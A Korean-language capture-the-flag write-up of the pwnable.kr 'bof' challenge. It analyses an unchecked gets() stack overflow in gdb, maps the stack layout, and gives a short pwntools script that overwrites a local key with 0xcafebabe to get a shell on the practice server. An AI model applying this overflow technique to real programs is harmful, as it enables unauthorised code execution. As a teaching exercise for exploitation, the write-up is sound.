[Toddle]bof

bof_WriteUp

나나가 말햇어요 bof가 얼마나 일반적인 소프트웨어 취약점이라고요 맞나요? 라는데..
아무래도 보안 취약점 첫 실습이 bof인 것을 보면 저도 공감합니다.(모든게 여기서 시작..)

보시면 저런식으로 다운로드 받으면 됩니다.

보호기법이.. bof만 쓰라고 하시는군요..

코드를 보시면 func의 키 값을 미리 넣고 8번 라인의.. 조건문에서 비교합니다.
근데 앞에서 gets에서 포멧 설정과 크기를 명시하지 않았기 때문에 bof가 발생합니다.

Memory Corruption: Stack Buffer Overflow

자세한 내용은 위 링크를 보고 확인할 수 있습니다.

---

Exploit design

그럼.. gdb로 한번 분석해봅시다.

저희 C코드를 보시면 아시겠지만 핵심은 func 코드임을 확인할 수 있습니다.
그래서 상세히 확인을 해봅시다.

15번까지는 프롤로그입니다(canary가 적용되서 익숙하지 않을 수 있어요)
위 보호기법들이 적용되어 있기에 일단 이후 문제에 나올것이기에 그런게 있구나 라고 넘어가시고..

보시면 29번에 ebp-0x2c로 우리가 원하는 overflowme의 buf의 크기를 알려줍니다.
또한 다른 방식으로는 if문(우회의 핵심)이 있는것을 토대로 분석한다면...

또한 key의 버퍼의 위치가 ebp+0x8..

그 위에는 아까 printf와 gets가 있는것을 확인가능하니까 call 부분의 2번째 부분에
인자를 확인한다면..

이런 식으로 나오니까 결국 ebp-0x2c입니다.
더 정확하게 보자면 overflowme-key-main-argv..로 버퍼가 구성되므로..

overflowme(0x2c) + key(0x8)을 더미로 채우고 변조가 가능하죠 
참고로 이런 방식을 자세히 보시면 아래와 같습니다.
그리고 stack alignment가 적용, 최적화로 아래같은 구조입니다.

buf[32] + dummy[12] + sfp[4] + ret[4] + key[4; 0xcafebabe]

여기서 ret를 무시해도 됩니다. 왜냐하면 우리는 ret overwrite가 아닌
그냥 스택은 쌓여있다는 특징을 이용하여 바로 밑에 if문에 영향을 주기에..
고로 바로 key 값에 영향을 주기에 우리가 리틀엔디안 형식으로 해당 값을 삽입하면 됩니다.

---

Exploit

from pwn import *
 
p = remote('pwnable.kr', 9000)
 
payload = cyclic(0x34)
payload += b'\xbe\xba\xfe\xca'
 
'''why using issue?'''
#p.sendlineafter('overflow me : ', payload)
p.sendline(payload)
 
p.interactive()

위에서 다 설명했기에 넘어갈께요..
근데 신기한게 여기서 sendlineafter해서 값 받을려고 하니까 안돼 안돼 막 이러는데
그 이유는 잘 모르겠네요.. 그냥 sendline 해서 보냈습니다.

cyclic는 그냥 버퍼 채우는건데 안 써도 되요

---

참고 자료

 

 

참고 이미지